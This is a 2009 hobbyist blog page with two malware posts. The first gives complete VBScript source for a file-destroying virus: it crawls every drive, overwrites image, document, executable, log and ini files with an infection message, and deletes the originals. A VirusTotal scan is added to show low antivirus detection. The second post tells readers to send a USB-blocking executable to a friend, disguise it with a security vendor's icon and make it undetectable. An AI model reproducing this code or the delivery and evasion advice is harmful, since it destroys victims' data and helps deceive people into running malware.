top software

Tuesday, 10 November 2009

Virus Makers.

Source Code of Virus

Here is some code that overwrites .jpg, .doc, .exe, .gif, .log and .ini extensions with "You have been infected" and changes them into .txt

I will try to change the code so it can have more stealth when dealing with antivirus programs.


Code:
On Error Resume Next

Dim FSobj, winDir, sysDir, copySelf, newFile, rawFileData, hackedFileData, fixData, dataFixed, newFileData
Set FSobj = CreateObject("Scripting.FileSystemOject")
Set sysDir = FSobj.GetSpecialFolder(1)

beginInfestation()

sub beginInfestation()
On Error Resume Next
Dim drive,machine
Set machine = FSobj.Drives
for each drive in machine
if (drive.type = 2) or (drive.type = 3) then
indexFolders(drive.Path&"\")
end if
next
end sub

sub indexFolders(location)
On Error Resume Next
Dim specs, file, subFol
Set specs = FSobj.GetFolder(location)
subFol = specs.SubFolders
for each file in subFol
spreadData(file.Path)
indexFolders(file.Path)
next
end sub

sub spreadData(location)
On Error Resume Next
Dim folder, directory, file, generateCopy, appName, adExt, orgMes, mesStageTwo, mesStageThree, finalMes, extName
Set folder = FSobj.GetFolder(location)
Set directory = folder.Files
orgMes = "You have been infected!"
esStageTwo=replace(orgMes,chr(42),chr(68))
mesStageThree=replace(mesStageTwo,chr(124),chr(46))
finalMes=replace(mesStageThree,chr(37),chr(76))
for each file in directory
extName=lcase(FSobj.GetExtensionName(file.Path))

if (extName="jpg")or(extName="gif")then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)

elseIf (extName="log")or(extName="ini") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)

elseIf (extName="doc")or(extName="exe") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
end if
next
end sub



Your Ad Here









SOME Anti-virus programs will pick this up. It is written in VBScript (.vbs extention)

UPDATE: 2/41 Antivirus programs picked this up. Scan done by virustotal:

Code:
a-squared 4.5.0.24 2009.08.06 -
AhnLab-V3 5.0.0.2 2009.08.05 -
AntiVir 7.9.0.240 2009.08.05 -
Antiy-AVL 2.0.3.7 2009.08.05 -
Authentium 5.1.2.4 2009.08.06 -
Avast 4.8.1335.0 2009.08.06 -
AVG 8.5.0.406 2009.08.05 -
BitDefender 7.2 2009.08.06 -
CAT-QuickHeal 10.00 2009.08.05 -
ClamAV 0.94.1 2009.08.05 VBS.Pluta.A
Comodo 1880 2009.08.06 -
DrWeb 5.0.0.12182 2009.08.06 -
eSafe 7.0.17.0 2009.08.05 -
eTrust-Vet 31.6.6660 2009.08.05 -
F-Prot 4.4.4.56 2009.08.05 -
F-Secure 8.0.14470.0 2009.08.05 -
Fortinet 3.120.0.0 2009.08.05 -
GData 19 2009.08.06 -
Ikarus T3.1.1.64.0 2009.08.06 -
Jiangmin 11.0.800 2009.08.05 -
K7AntiVirus 7.10.811 2009.08.05 -
Kaspersky 7.0.0.125 2009.08.06 -
McAfee 5699 2009.08.05 -
McAfee+Artemis 5699 2009.08.05 -
McAfee-GW-Edition 6.8.5 2009.08.06 -
Microsoft 1.4903 2009.08.04 Virus:VBS/Generic1
NOD32 4310 2009.08.05 -
Norman 6.01.09 2009.08.05 -
nProtect 2009.1.8.0 2009.08.05 -
Panda 10.0.0.14 2009.08.05 -
PCTools 4.4.2.0 2009.08.05 -
Prevx 3.0 2009.08.06 -
Rising 21.41.24.00 2009.08.05 -
Sophos 4.44.0 2009.08.05 -
Sunbelt 3.2.1858.2 2009.08.05 -
Symantec 1.4.4.12 2009.08.06 -
TheHacker 6.3.4.3.377 2009.08.05 -
TrendMicro 8.950.0.1094 2009.08.05 -
VBA32 3.12.10.9 2009.08.06 -
ViRobot 2009.8.5.1869 2009.08.05 -
VirusBuster 4.6.5.0 2009.08.05 -


Friday, July 31, 2009


Creating a Virus to Disable USB Ports



Virus to disable USP portsDo you want to play a prank with your friend’s computer by disabling their USB ports? If so here is a nice trick to do that! In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer(PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the victim will not be able to use his pen drive or any other USB peripheral on his computer. The source code for this virus along with the compiled module is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports. Here is a step by step procedure to start playing the prank on your friend’s computer.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
  • block_usb.exe
  • unblock_usb.exe
3. Out of these 4 files the block_usb.exe is the virus that will block (disable) all the USB ports on the computer upon execution (double click). You need to send this file to your friend. Once he executes it it’ll block all the USB ports on his computer.
4. Before sending you can test it on your own computer. To test, just run theblock_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run theunblock_usb.exe file. Now insert the pen drive and it should get detected.
5. The block_usb.c and unblock_usb.c are the source codes. You can compile them by yourself in case if you’re interested (This is optional).
6. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
7. You can also change the icon of this file to make it look like a legitimate program. Example Take the Icon of Norton or something else and Bind the Exe File with it with any Binder. And Use Software PassPort to make it Undetectable.
I hope you like this post. Please pass your comments.
WARNING: This post is for educational purposes only. Do not misuse it.







Your Ad Here

Labels:

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home